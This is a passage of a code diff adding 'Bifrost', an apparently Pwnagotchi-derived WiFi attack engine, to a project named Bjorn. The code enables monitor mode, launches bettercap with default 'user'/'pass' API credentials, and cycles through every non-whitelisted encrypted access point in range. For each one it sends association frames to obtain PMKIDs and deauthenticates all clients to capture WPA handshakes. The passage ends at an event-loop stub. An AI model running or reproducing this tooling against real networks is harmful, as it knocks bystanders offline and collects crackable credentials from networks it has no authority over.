'all_scores': {k: v for k, v in action_scores.items() if v > 0}
'bootstrap_used': bootstrap_used,
'all_scores': {k: round(v, 4) for k, v in action_scores.items() if v > 0}
}
return best_action, best_score, debug_info
@@ -833,6 +1081,12 @@ class BjornAIEngine:
'training_samples': self.model_config.get('training_samples')
})
# AI-03: Include model versioning info
stats['model_info'] = self.get_model_info()
# AI-04: Include bootstrap stats
stats['bootstrap_entries'] = len(self._bootstrap_scores)
return stats

585
bifrost/__init__.py Normal file
View File

@@ -0,0 +1,585 @@
"""
Bifrost — Pwnagotchi-compatible WiFi recon engine for Bjorn.
Runs as a daemon thread alongside MANUAL/AUTO/AI modes.
"""
import os
import time
import subprocess
import threading
import logging
from logger import Logger
logger = Logger(name="bifrost", level=logging.DEBUG)
class BifrostEngine:
"""Main Bifrost lifecycle manager.
Manages the bettercap subprocess and BifrostAgent daemon loop.
Pattern follows SentinelEngine (sentinel.py).
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self._thread = None
self._stop_event = threading.Event()
self._running = False
self._bettercap_proc = None
self._monitor_torn_down = False
self._monitor_failed = False
self.agent = None
@property
def enabled(self):
    """Whether the `bifrost_enabled` config flag is set."""
    flag = self.shared_data.config.get('bifrost_enabled', False)
    return bool(flag)
def start(self):
    """Start the Bifrost engine (bettercap + agent loop).

    Idempotent while running; if a previous thread is still winding down,
    it is signalled to stop and joined before the new one is spawned.
    """
    if self._running:
        logger.warning("Bifrost already running")
        return
    # Wait for any previous thread to finish before re-starting
    if self._thread and self._thread.is_alive():
        logger.warning("Previous Bifrost thread still running — waiting ...")
        self._stop_event.set()
        self._thread.join(timeout=15)
    logger.info("Starting Bifrost engine ...")
    # Reset run flags for the fresh session; _loop()'s finally clears them on exit.
    self._stop_event.clear()
    self._running = True
    self._monitor_failed = False
    self._monitor_torn_down = False
    self._thread = threading.Thread(
        target=self._loop, daemon=True, name="BifrostEngine"
    )
    self._thread.start()
def stop(self):
    """Stop the Bifrost engine gracefully.

    Signals the daemon loop to exit, then waits for it to finish.
    The loop's finally block handles bettercap shutdown and monitor teardown.
    """
    if not self._running:
        return
    logger.info("Stopping Bifrost engine ...")
    self._stop_event.set()
    self._running = False
    if self._thread and self._thread.is_alive():
        self._thread.join(timeout=15)
    self._thread = None
    self.agent = None
    # Safety net: teardown is idempotent, so this is a no-op if
    # _loop()'s finally already ran it.
    self._stop_bettercap()
    self._teardown_monitor_mode()
    logger.info("Bifrost engine stopped")
def _loop(self):
    """Main daemon loop — setup monitor mode, start bettercap, create agent, run recon cycle."""
    try:
        # Install compatibility shim for pwnagotchi plugins
        from bifrost import plugins as bfplugins
        from bifrost.compat import install_shim
        install_shim(self.shared_data, bfplugins)
        # Setup monitor mode on the WiFi interface
        self._setup_monitor_mode()
        if self._monitor_failed:
            logger.error(
                "Monitor mode setup failed — Bifrost cannot operate without monitor "
                "mode. For Broadcom chips (Pi Zero W/2W), install nexmon: "
                "https://github.com/seemoo-lab/nexmon — "
                "Or use an external USB WiFi adapter with monitor mode support.")
            # Teardown first (restores network services) BEFORE switching mode,
            # so the orchestrator doesn't start scanning on a dead network.
            self._teardown_monitor_mode()
            self._running = False
            # Now switch mode back to AUTO — the network should be restored.
            # We set the flag directly FIRST (bypass setter to avoid re-stopping),
            # then ensure manual_mode/ai_mode are cleared so getter returns AUTO.
            try:
                self.shared_data.config["bifrost_enabled"] = False
                self.shared_data.config["manual_mode"] = False
                self.shared_data.config["ai_mode"] = False
                self.shared_data.manual_mode = False
                self.shared_data.ai_mode = False
                self.shared_data.invalidate_config_cache()
                logger.info("Bifrost auto-disabled due to monitor mode failure — mode: AUTO")
            except Exception:
                pass
            return
        # Start bettercap
        self._start_bettercap()
        self._stop_event.wait(3)  # Give bettercap time to initialize
        if self._stop_event.is_set():
            return
        # Create agent (pass stop_event so its threads exit cleanly)
        from bifrost.agent import BifrostAgent
        self.agent = BifrostAgent(self.shared_data, stop_event=self._stop_event)
        # Load plugins
        bfplugins.load(self.shared_data.config)
        # Initialize agent
        self.agent.start()
        logger.info("Bifrost agent started — entering recon cycle")
        # Main recon loop (port of do_auto_mode from pwnagotchi)
        while not self._stop_event.is_set():
            try:
                # Full spectrum scan
                self.agent.recon()
                if self._stop_event.is_set():
                    break
                # Get APs grouped by channel
                channels = self.agent.get_access_points_by_channel()
                # For each channel
                for ch, aps in channels:
                    if self._stop_event.is_set():
                        break
                    self.agent.set_channel(ch)
                    # For each AP on this channel
                    for ap in aps:
                        if self._stop_event.is_set():
                            break
                        # Send association frame for PMKID
                        self.agent.associate(ap)
                        # Deauth all clients for full handshake
                        for sta in ap.get('clients', []):
                            if self._stop_event.is_set():
                                break
                            self.agent.deauth(ap, sta)
                if not self._stop_event.is_set():
                    self.agent.next_epoch()
            except Exception as e:
                if 'wifi.interface not set' in str(e):
                    # Interface vanished — back off a full minute before retrying.
                    logger.error("WiFi interface lost: %s", e)
                    self._stop_event.wait(60)
                    if not self._stop_event.is_set():
                        self.agent.next_epoch()
                else:
                    logger.error("Recon loop error: %s", e)
                    self._stop_event.wait(5)
    except Exception as e:
        logger.error("Bifrost engine fatal error: %s", e)
    finally:
        # Always unwind: plugin shutdown, kill bettercap, restore managed WiFi.
        from bifrost import plugins as bfplugins
        bfplugins.shutdown()
        self._stop_bettercap()
        self._teardown_monitor_mode()
        self._running = False
# ── Monitor mode management ─────────────────────────
# ── Nexmon helpers ────────────────────────────────────
@staticmethod
def _has_nexmon():
"""Check if nexmon firmware patches are installed."""
import shutil
if not shutil.which('nexutil'):
return False
# Verify patched firmware via dmesg
try:
r = subprocess.run(
['dmesg'], capture_output=True, text=True, timeout=5)
if 'nexmon' in r.stdout.lower():
return True
except Exception:
pass
# nexutil exists — assume usable even without dmesg confirmation
return True
@staticmethod
def _is_brcmfmac(iface):
"""Check if the interface uses the brcmfmac driver (Broadcom)."""
driver_path = '/sys/class/net/%s/device/driver' % iface
try:
real = os.path.realpath(driver_path)
return 'brcmfmac' in real
except Exception:
return False
def _detect_phy(self, iface):
"""Detect the phy name for a given interface (e.g. 'phy0')."""
try:
r = subprocess.run(
['iw', 'dev', iface, 'info'],
capture_output=True, text=True, timeout=5)
for line in r.stdout.splitlines():
if 'wiphy' in line:
idx = line.strip().split()[-1]
return 'phy%s' % idx
except Exception:
pass
return 'phy0'
def _setup_monitor_mode(self):
    """Put the WiFi interface into monitor mode.

    Strategy order:
      1. Nexmon — for Broadcom brcmfmac chips (Pi Zero W / Pi Zero 2 W)
         Uses: iw phy <phy> interface add mon0 type monitor + nexutil -m2
      2. airmon-ng — for chipsets with proper driver support (Atheros, Realtek, etc.)
      3. iw — direct fallback for other drivers

    On failure sets self._monitor_failed so _loop() can bail out cleanly.
    """
    self._monitor_torn_down = False
    self._nexmon_used = False
    cfg = self.shared_data.config
    iface = cfg.get('bifrost_iface', 'wlan0mon')
    # If configured iface already ends with 'mon', derive the base name
    if iface.endswith('mon'):
        base_iface = iface[:-3]  # e.g. 'wlan0mon' -> 'wlan0'
    else:
        base_iface = iface
    # Store original interface name for teardown
    self._base_iface = base_iface
    self._mon_iface = iface
    # Check if a monitor interface already exists
    if iface != base_iface and self._iface_exists(iface):
        logger.info("Monitor interface %s already exists", iface)
        return
    # ── Strategy 1: Nexmon (Broadcom brcmfmac) ────────────────
    if self._is_brcmfmac(base_iface):
        logger.info("Broadcom brcmfmac chip detected on %s", base_iface)
        if self._has_nexmon():
            if self._setup_nexmon(base_iface, cfg):
                return
            # nexmon setup failed — don't try other strategies, they won't work either
            self._monitor_failed = True
            return
        else:
            logger.error(
                "Broadcom brcmfmac chip requires nexmon firmware patches for "
                "monitor mode. Install nexmon manually using install_nexmon.sh "
                "or visit: https://github.com/seemoo-lab/nexmon")
            self._monitor_failed = True
            return
    # ── Strategy 2: airmon-ng (Atheros, Realtek, etc.) ────────
    airmon_ok = False
    try:
        logger.info("Killing interfering processes ...")
        subprocess.run(
            ['airmon-ng', 'check', 'kill'],
            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
            timeout=15,
        )
        logger.info("Starting monitor mode: airmon-ng start %s", base_iface)
        result = subprocess.run(
            ['airmon-ng', 'start', base_iface],
            capture_output=True, text=True, timeout=30,
        )
        combined = (result.stdout + result.stderr).strip()
        logger.info("airmon-ng output: %s", combined)
        if 'Operation not supported' in combined or 'command failed' in combined:
            logger.warning("airmon-ng failed: %s", combined)
        else:
            # airmon-ng may rename the interface (wlan0 -> wlan0mon)
            if self._iface_exists(iface):
                logger.info("Monitor mode active: %s", iface)
                airmon_ok = True
            elif self._iface_exists(base_iface):
                logger.info("Interface %s is now in monitor mode (no rename)", base_iface)
                cfg['bifrost_iface'] = base_iface
                self._mon_iface = base_iface
                airmon_ok = True
        if airmon_ok:
            return
    except FileNotFoundError:
        logger.warning("airmon-ng not found, trying iw fallback ...")
    except Exception as e:
        logger.warning("airmon-ng failed: %s, trying iw fallback ...", e)
    # ── Strategy 3: iw (direct fallback) ──────────────────────
    try:
        subprocess.run(
            ['ip', 'link', 'set', base_iface, 'down'],
            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
        )
        result = subprocess.run(
            ['iw', 'dev', base_iface, 'set', 'type', 'monitor'],
            capture_output=True, text=True, timeout=10,
        )
        if result.returncode != 0:
            err = result.stderr.strip()
            logger.error("iw set monitor failed (rc=%d): %s", result.returncode, err)
            self._monitor_failed = True
            # Bring the interface back up so the system isn't left on a dead link.
            subprocess.run(
                ['ip', 'link', 'set', base_iface, 'up'],
                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
            )
            return
        subprocess.run(
            ['ip', 'link', 'set', base_iface, 'up'],
            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
        )
        logger.info("Monitor mode set via iw on %s", base_iface)
        cfg['bifrost_iface'] = base_iface
        self._mon_iface = base_iface
    except Exception as e:
        logger.error("Failed to set monitor mode: %s", e)
        self._monitor_failed = True
def _setup_nexmon(self, base_iface, cfg):
    """Enable monitor mode using nexmon (for Broadcom brcmfmac chips).

    Creates a separate monitor interface (mon0) so wlan0 can potentially
    remain usable for management traffic (like pwnagotchi does).
    Returns True on success, False on failure.
    """
    mon_iface = 'mon0'
    phy = self._detect_phy(base_iface)
    logger.info("Nexmon: setting up monitor mode on %s (phy=%s)", base_iface, phy)
    try:
        # Kill interfering services (same as pwnagotchi)
        for svc in ('wpa_supplicant', 'NetworkManager', 'dhcpcd'):
            subprocess.run(
                ['systemctl', 'stop', svc],
                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
            )
        # Remove old mon0 if it exists
        if self._iface_exists(mon_iface):
            subprocess.run(
                ['iw', 'dev', mon_iface, 'del'],
                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
            )
        # Create monitor interface via iw phy
        result = subprocess.run(
            ['iw', 'phy', phy, 'interface', 'add', mon_iface, 'type', 'monitor'],
            capture_output=True, text=True, timeout=10,
        )
        if result.returncode != 0:
            logger.error("Failed to create %s: %s", mon_iface, result.stderr.strip())
            return False
        # Bring monitor interface up
        subprocess.run(
            ['ifconfig', mon_iface, 'up'],
            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
        )
        # Enable monitor mode with radiotap headers via nexutil
        result = subprocess.run(
            ['nexutil', '-m2'],
            capture_output=True, text=True, timeout=10,
        )
        if result.returncode != 0:
            # Non-fatal: some firmware builds report oddly; verify below instead.
            logger.warning("nexutil -m2 returned rc=%d: %s", result.returncode, result.stderr.strip())
        # Verify
        verify = subprocess.run(
            ['nexutil', '-m'],
            capture_output=True, text=True, timeout=5,
        )
        mode_val = verify.stdout.strip()
        logger.info("nexutil -m reports: %s", mode_val)
        if not self._iface_exists(mon_iface):
            logger.error("Monitor interface %s not created", mon_iface)
            return False
        # Success — update config to use mon0
        cfg['bifrost_iface'] = mon_iface
        self._mon_iface = mon_iface
        self._nexmon_used = True
        logger.info("Nexmon monitor mode active on %s (phy=%s)", mon_iface, phy)
        return True
    except FileNotFoundError as e:
        logger.error("Required tool not found: %s", e)
        return False
    except Exception as e:
        logger.error("Nexmon setup error: %s", e)
        return False
def _teardown_monitor_mode(self):
    """Restore the WiFi interface to managed mode (idempotent).

    Mirrors whichever setup strategy was used (nexmon vs airmon-ng/iw),
    then restarts the network services that setup killed.
    """
    if self._monitor_torn_down:
        return
    base_iface = getattr(self, '_base_iface', None)
    mon_iface = getattr(self, '_mon_iface', None)
    if not base_iface:
        # Setup never ran — nothing to restore.
        return
    self._monitor_torn_down = True
    logger.info("Restoring managed mode for %s ...", base_iface)
    if getattr(self, '_nexmon_used', False):
        # ── Nexmon teardown ──
        try:
            subprocess.run(
                ['nexutil', '-m0'],
                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
            )
            logger.info("Nexmon monitor mode disabled (nexutil -m0)")
        except Exception:
            pass
        # Remove the mon0 interface
        if mon_iface and mon_iface != base_iface and self._iface_exists(mon_iface):
            try:
                subprocess.run(
                    ['iw', 'dev', mon_iface, 'del'],
                    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
                )
                logger.info("Removed monitor interface %s", mon_iface)
            except Exception:
                pass
    else:
        # ── airmon-ng / iw teardown ──
        try:
            iface_to_stop = mon_iface or base_iface
            subprocess.run(
                ['airmon-ng', 'stop', iface_to_stop],
                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
                timeout=15,
            )
            logger.info("Monitor mode stopped via airmon-ng")
        except FileNotFoundError:
            # airmon-ng missing — fall back to raw ip/iw commands.
            try:
                subprocess.run(
                    ['ip', 'link', 'set', base_iface, 'down'],
                    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
                )
                subprocess.run(
                    ['iw', 'dev', base_iface, 'set', 'type', 'managed'],
                    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
                )
                subprocess.run(
                    ['ip', 'link', 'set', base_iface, 'up'],
                    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
                )
                logger.info("Managed mode restored via iw on %s", base_iface)
            except Exception as e:
                logger.error("Failed to restore managed mode: %s", e)
        except Exception as e:
            logger.warning("airmon-ng stop failed: %s", e)
    # Restart network services that were killed
    restarted = False
    for svc in ('wpa_supplicant', 'dhcpcd', 'NetworkManager'):
        try:
            subprocess.run(
                ['systemctl', 'start', svc],
                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=15,
            )
            restarted = True
        except Exception:
            pass
    # Wait for network services to actually reconnect before handing
    # control back so the orchestrator doesn't scan a dead interface.
    if restarted:
        logger.info("Waiting for network services to reconnect ...")
        time.sleep(5)
@staticmethod
def _iface_exists(iface_name):
"""Check if a network interface exists."""
return os.path.isdir('/sys/class/net/%s' % iface_name)
# ── Bettercap subprocess management ────────────────
def _start_bettercap(self):
    """Spawn bettercap subprocess with REST API.

    Raises on FileNotFoundError (bettercap missing) or any spawn failure,
    so _loop() aborts instead of running without a backend.
    """
    cfg = self.shared_data.config
    iface = cfg.get('bifrost_iface', 'wlan0mon')
    host = cfg.get('bifrost_bettercap_host', '127.0.0.1')
    port = str(cfg.get('bifrost_bettercap_port', 8081))
    user = cfg.get('bifrost_bettercap_user', 'user')
    password = cfg.get('bifrost_bettercap_pass', 'pass')
    # The -eval lines configure and enable the REST API the agent talks to.
    cmd = [
        'bettercap', '-iface', iface, '-no-colors',
        '-eval', 'set api.rest.address %s' % host,
        '-eval', 'set api.rest.port %s' % port,
        '-eval', 'set api.rest.username %s' % user,
        '-eval', 'set api.rest.password %s' % password,
        '-eval', 'api.rest on',
    ]
    logger.info("Starting bettercap: %s", ' '.join(cmd))
    try:
        self._bettercap_proc = subprocess.Popen(
            cmd,
            stdout=subprocess.DEVNULL,
            stderr=subprocess.DEVNULL,
        )
        logger.info("bettercap PID: %d", self._bettercap_proc.pid)
    except FileNotFoundError:
        logger.error("bettercap not found! Install with: apt install bettercap")
        raise
    except Exception as e:
        logger.error("Failed to start bettercap: %s", e)
        raise
def _stop_bettercap(self):
"""Kill the bettercap subprocess."""
if self._bettercap_proc:
try:
self._bettercap_proc.terminate()
self._bettercap_proc.wait(timeout=5)
except subprocess.TimeoutExpired:
self._bettercap_proc.kill()
except Exception:
pass
self._bettercap_proc = None
logger.info("bettercap stopped")
# ── Status for web API ────────────────────────────────
def get_status(self):
    """Return full engine status for web API."""
    status = {
        'enabled': self.enabled,
        'running': self._running,
        'monitor_failed': self._monitor_failed,
    }
    if self.agent and self._running:
        # Live session: merge the agent's real-time counters.
        status.update(self.agent.get_status())
        return status
    # Idle: placeholder values so the UI always has a complete schema.
    status.update({
        'mood': 'sleeping',
        'face': '(-.-) zzZ',
        'voice': '',
        'channel': 0,
        'num_aps': 0,
        'num_handshakes': 0,
        'uptime': 0,
        'epoch': 0,
        'mode': 'auto',
        'last_pwnd': '',
        'reward': 0,
    })
    return status

568
bifrost/agent.py Normal file
View File

@@ -0,0 +1,568 @@
"""
Bifrost — WiFi recon agent.
Ported from pwnagotchi/agent.py using composition instead of inheritance.
"""
import time
import json
import os
import re
import asyncio
import threading
import logging
from bifrost.bettercap import BettercapClient
from bifrost.automata import BifrostAutomata
from bifrost.epoch import BifrostEpoch
from bifrost.voice import BifrostVoice
from bifrost import plugins
from logger import Logger
logger = Logger(name="bifrost.agent", level=logging.DEBUG)
class BifrostAgent:
"""WiFi recon agent — drives bettercap, captures handshakes, tracks epochs."""
def __init__(self, shared_data, stop_event=None):
    """Wire up the bettercap client, automata, epoch tracker and voice.

    shared_data: global Bjorn state (provides config + db).
    stop_event: optional threading.Event shared with the engine so every
    agent background thread exits when the engine stops.
    """
    self.shared_data = shared_data
    self._config = shared_data.config
    self.db = shared_data.db
    self._stop_event = stop_event or threading.Event()
    # Sub-systems
    cfg = self._config
    self.bettercap = BettercapClient(
        hostname=cfg.get('bifrost_bettercap_host', '127.0.0.1'),
        scheme='http',
        port=int(cfg.get('bifrost_bettercap_port', 8081)),
        username=cfg.get('bifrost_bettercap_user', 'user'),
        password=cfg.get('bifrost_bettercap_pass', 'pass'),
    )
    self.automata = BifrostAutomata(cfg)
    self.epoch = BifrostEpoch(cfg)
    self.voice = BifrostVoice()
    self._started_at = time.time()
    # Optional AP hostname/MAC regex filter; None means match everything.
    self._filter = None
    flt = cfg.get('bifrost_filter', '')
    if flt:
        try:
            self._filter = re.compile(flt)
        except re.error:
            logger.warning("Invalid bifrost_filter regex: %s", flt)
    self._current_channel = 0
    self._tot_aps = 0
    self._aps_on_channel = 0
    self._supported_channels = list(range(1, 15))
    self._access_points = []
    self._last_pwnd = None
    self._history = {}     # interaction counts per MAC (rate limiting)
    self._handshakes = {}  # captured handshakes keyed by "sta -> ap"
    self.mode = 'auto'
    # Whitelist
    self._whitelist = [
        w.strip().lower() for w in
        str(cfg.get('bifrost_whitelist', '')).split(',') if w.strip()
    ]
    # Channels
    self._channels = [
        int(c.strip()) for c in
        str(cfg.get('bifrost_channels', '')).split(',') if c.strip()
    ]
    # Ensure handshakes dir
    hs_dir = cfg.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes')
    if hs_dir and not os.path.exists(hs_dir):
        try:
            os.makedirs(hs_dir, exist_ok=True)
        except OSError:
            pass
# ── Lifecycle ─────────────────────────────────────────
def start(self):
    """Initialize bettercap, start monitor mode, begin event polling.

    Ordering matters: the REST API must answer before anything else is
    configured, and event/stat threads start only once recon is possible.
    """
    self._wait_bettercap()
    self.setup_events()
    self.automata.set_starting()
    self._log_activity('system', 'Bifrost starting', self.voice.on_starting())
    self.start_monitor_mode()
    self.start_event_polling()
    self.start_session_fetcher()
    self.next_epoch()
    self.automata.set_ready()
    self._log_activity('system', 'Bifrost ready', self.voice.on_ready())
def setup_events(self):
    """Silence noisy bettercap events so the stream stays useful."""
    logger.info("connecting to %s ...", self.bettercap.url)
    noisy_tags = (
        'ble.device.new', 'ble.device.lost', 'ble.device.disconnected',
        'ble.device.connected', 'ble.device.service.discovered',
        'ble.device.characteristic.discovered',
        'mod.started', 'mod.stopped', 'update.available',
        'session.closing', 'session.started',
    )
    for tag in noisy_tags:
        try:
            self.bettercap.run('events.ignore %s' % tag, verbose_errors=False)
        except Exception:
            # Ignoring an unknown tag is harmless — keep going.
            pass
def _reset_wifi_settings(self):
iface = self._config.get('bifrost_iface', 'wlan0mon')
self.bettercap.run('set wifi.interface %s' % iface)
self.bettercap.run('set wifi.ap.ttl %d' % self._config.get('bifrost_personality_ap_ttl', 120))
self.bettercap.run('set wifi.sta.ttl %d' % self._config.get('bifrost_personality_sta_ttl', 300))
self.bettercap.run('set wifi.rssi.min %d' % self._config.get('bifrost_personality_min_rssi', -200))
hs_dir = self._config.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes')
self.bettercap.run('set wifi.handshakes.file %s' % hs_dir)
self.bettercap.run('set wifi.handshakes.aggregate false')
def start_monitor_mode(self):
    """Wait for monitor interface and start wifi.recon.

    Polls bettercap's interface list for up to ~60s (30 × 2s), detects the
    channels the hardware supports, applies wifi settings, then enables recon.
    """
    iface = self._config.get('bifrost_iface', 'wlan0mon')
    has_mon = False
    retries = 0
    while not has_mon and retries < 30 and not self._stop_event.is_set():
        try:
            s = self.bettercap.session()
            for i in s.get('interfaces', []):
                if i['name'] == iface:
                    logger.info("found monitor interface: %s", i['name'])
                    has_mon = True
                    break
        except Exception:
            pass
        if not has_mon:
            logger.info("waiting for monitor interface %s ... (%d)", iface, retries)
            self._stop_event.wait(2)
            retries += 1
    if not has_mon:
        # Proceed anyway — wifi.recon below will surface the real error.
        logger.warning("monitor interface %s not found after %d retries", iface, retries)
    # Detect supported channels
    try:
        from bifrost.compat import _build_utils_shim
        self._supported_channels = _build_utils_shim(self.shared_data).iface_channels(iface)
    except Exception:
        self._supported_channels = list(range(1, 15))
    logger.info("supported channels: %s", self._supported_channels)
    self._reset_wifi_settings()
    # Start wifi recon
    try:
        wifi_running = self._is_module_running('wifi')
        if wifi_running:
            # Module already on from a previous session — restart and clear stale APs.
            self.bettercap.run('wifi.recon off; wifi.recon on')
            self.bettercap.run('wifi.clear')
        else:
            self.bettercap.run('wifi.recon on')
    except Exception as e:
        err_msg = str(e)
        if 'Operation not supported' in err_msg or 'EOPNOTSUPP' in err_msg:
            logger.error(
                "wifi.recon failed: %s — Your WiFi chip likely does NOT support "
                "monitor mode. The built-in Broadcom chip on Raspberry Pi Zero/Zero 2 "
                "has limited monitor mode support. Use an external USB WiFi adapter "
                "(e.g. Alfa AWUS036ACH, Panda PAU09) that supports monitor mode and "
                "packet injection.", e)
            self._log_activity('error',
                               'WiFi chip does not support monitor mode',
                               'Use an external USB WiFi adapter with monitor mode support')
        else:
            logger.error("Error starting wifi.recon: %s", e)
def _wait_bettercap(self):
retries = 0
while retries < 30 and not self._stop_event.is_set():
try:
self.bettercap.session()
return
except Exception:
logger.info("waiting for bettercap API ...")
self._stop_event.wait(2)
retries += 1
if not self._stop_event.is_set():
raise Exception("bettercap API not available after 60s")
def _is_module_running(self, module):
try:
s = self.bettercap.session()
for m in s.get('modules', []):
if m['name'] == module:
return m['running']
except Exception:
pass
return False
# ── Recon cycle ───────────────────────────────────────
def recon(self):
    """Full-spectrum WiFi scan for recon_time seconds.

    Doubles the scan window when the last few epochs were inactive, then
    points bettercap at the configured channels (or all of them) and waits.
    """
    recon_time = self._config.get('bifrost_personality_recon_time', 30)
    max_inactive = 3
    recon_mul = 2
    # Scan longer when nothing has happened recently.
    if self.epoch.inactive_for >= max_inactive:
        recon_time *= recon_mul
    self._current_channel = 0
    if not self._channels:
        logger.debug("RECON %ds (all channels)", recon_time)
        try:
            self.bettercap.run('wifi.recon.channel clear')
        except Exception:
            pass
    else:
        ch_str = ','.join(map(str, self._channels))
        logger.debug("RECON %ds on channels %s", recon_time, ch_str)
        try:
            self.bettercap.run('wifi.recon.channel %s' % ch_str)
        except Exception as e:
            logger.error("Error setting recon channels: %s", e)
    self.automata.wait_for(recon_time, self.epoch, sleeping=False,
                           stop_event=self._stop_event)
def _filter_included(self, ap):
if self._filter is None:
return True
return (self._filter.match(ap.get('hostname', '')) is not None or
self._filter.match(ap.get('mac', '')) is not None)
def get_access_points(self):
    """Fetch APs from bettercap, filter whitelist and open networks.

    Side effects: notifies plugins (raw + filtered lists), feeds the epoch
    observer, caches the result on self and persists networks to the DB.
    """
    aps = []
    try:
        s = self.bettercap.session()
        # Give plugins the raw list before any filtering is applied.
        plugins.on("unfiltered_ap_list", s.get('wifi', {}).get('aps', []))
        for ap in s.get('wifi', {}).get('aps', []):
            enc = ap.get('encryption', '')
            if enc == '' or enc == 'OPEN':
                continue  # open networks have no handshake worth capturing
            hostname = ap.get('hostname', '').lower()
            mac = ap.get('mac', '').lower()
            prefix = mac[:8]  # OUI prefix — whitelist can match a whole vendor
            if (hostname not in self._whitelist and
                    mac not in self._whitelist and
                    prefix not in self._whitelist):
                if self._filter_included(ap):
                    aps.append(ap)
    except Exception as e:
        logger.error("Error getting APs: %s", e)
    aps.sort(key=lambda a: a.get('channel', 0))
    self._access_points = aps
    plugins.on('wifi_update', aps)
    self.epoch.observe(aps, list(self.automata.peers.values()))
    # Update DB with discovered networks
    self._persist_networks(aps)
    return aps
def get_access_points_by_channel(self):
    """Group visible APs by channel, densest channel first."""
    by_channel = {}
    for ap in self.get_access_points():
        ch = ap.get('channel', 0)
        if self._channels and ch not in self._channels:
            continue  # honor the configured channel whitelist
        if ch in by_channel:
            by_channel[ch].append(ap)
        else:
            by_channel[ch] = [ap]
    # Visit the busiest channels first to maximize capture opportunities.
    return sorted(by_channel.items(), key=lambda item: len(item[1]), reverse=True)
# ── Actions ───────────────────────────────────────────
def _should_interact(self, who):
if self._has_handshake(who):
return False
if who not in self._history:
self._history[who] = 1
return True
self._history[who] += 1
max_int = self._config.get('bifrost_personality_max_interactions', 3)
return self._history[who] < max_int
def _has_handshake(self, bssid):
for key in self._handshakes:
if bssid.lower() in key:
return True
return False
def associate(self, ap, throttle=0):
    """Send association frame to trigger PMKID.

    Skipped when the automata marks the epoch stale, when association is
    disabled in config, or when this AP is already pwned/over-tried.
    throttle: optional seconds to sleep after the frame is sent.
    """
    if self.automata.is_stale(self.epoch):
        return
    if (self._config.get('bifrost_personality_associate', True) and
            self._should_interact(ap.get('mac', ''))):
        try:
            hostname = ap.get('hostname', ap.get('mac', '?'))
            logger.info("ASSOC %s (%s) ch=%d rssi=%d",
                        hostname, ap.get('mac', ''), ap.get('channel', 0), ap.get('rssi', 0))
            self.bettercap.run('wifi.assoc %s' % ap['mac'])
            self.epoch.track(assoc=True)
            self._log_activity('assoc', 'Association: %s' % hostname,
                               self.voice.on_assoc(hostname))
        except Exception as e:
            self.automata.on_error(ap.get('mac', ''), e)
        plugins.on('association', ap)
        if throttle > 0:
            time.sleep(throttle)
def deauth(self, ap, sta, throttle=0):
    """Deauthenticate client to capture handshake.

    Kicks *sta* off *ap* so its reconnect produces a full 4-way handshake.
    Skipped when the epoch is stale, deauth is disabled in config, or the
    station is already pwned/over-tried. throttle: optional post-send sleep.
    """
    if self.automata.is_stale(self.epoch):
        return
    if (self._config.get('bifrost_personality_deauth', True) and
            self._should_interact(sta.get('mac', ''))):
        try:
            logger.info("DEAUTH %s (%s) from %s ch=%d",
                        sta.get('mac', ''), sta.get('vendor', ''),
                        ap.get('hostname', ap.get('mac', '')), ap.get('channel', 0))
            self.bettercap.run('wifi.deauth %s' % sta['mac'])
            self.epoch.track(deauth=True)
            self._log_activity('deauth', 'Deauth: %s' % sta.get('mac', ''),
                               self.voice.on_deauth(sta.get('mac', '')))
        except Exception as e:
            self.automata.on_error(sta.get('mac', ''), e)
        plugins.on('deauthentication', ap, sta)
        if throttle > 0:
            time.sleep(throttle)
def set_channel(self, channel, verbose=True):
    """Hop to a specific WiFi channel.

    Lingers on the current channel first when recent deauth/assoc activity
    suggests a handshake may still be in flight.
    """
    if self.automata.is_stale(self.epoch):
        return
    wait = 0
    if self.epoch.did_deauth:
        wait = self._config.get('bifrost_personality_hop_recon_time', 10)
    elif self.epoch.did_associate:
        wait = self._config.get('bifrost_personality_min_recon_time', 5)
    if channel != self._current_channel:
        # Channel 0 means "no channel yet" — nothing worth lingering on.
        if self._current_channel != 0 and wait > 0:
            logger.debug("waiting %ds on channel %d", wait, self._current_channel)
            self.automata.wait_for(wait, self.epoch, stop_event=self._stop_event)
        try:
            self.bettercap.run('wifi.recon.channel %d' % channel)
            self._current_channel = channel
            self.epoch.track(hop=True)
            plugins.on('channel_hop', channel)
        except Exception as e:
            logger.error("Error setting channel: %s", e)
def next_epoch(self):
    """Transition to next epoch — evaluate mood.

    Delegates the roll-over to the automata, then persists the finished
    epoch's data and logs it (epoch counter has already advanced, hence -1).
    """
    self.automata.next_epoch(self.epoch)
    # Persist epoch to DB
    data = self.epoch.data()
    self._persist_epoch(data)
    self._log_activity('epoch', 'Epoch %d' % (self.epoch.epoch - 1),
                       self.voice.on_epoch(self.epoch.epoch - 1))
# ── Event polling ─────────────────────────────────────
def start_event_polling(self):
    """Start event listener in background thread.

    Tries websocket first; falls back to REST polling if the
    ``websockets`` package is not installed.
    """
    worker = threading.Thread(
        target=self._event_poller, daemon=True, name="BifrostEvents")
    worker.start()
def _event_poller(self):
    """Clear stale events, then dispatch to the websocket or REST listener."""
    try:
        self.bettercap.run('events.clear')
    except Exception:
        pass
    # Probe once whether websockets is available
    try:
        import websockets  # noqa: F401
    except ImportError:
        logger.warning("websockets package not installed — using REST event polling "
                       "(pip install websockets for real-time events)")
        self._rest_event_loop()
        return
    self._ws_event_loop()
def _ws_event_loop(self):
"""Websocket-based event listener (preferred)."""
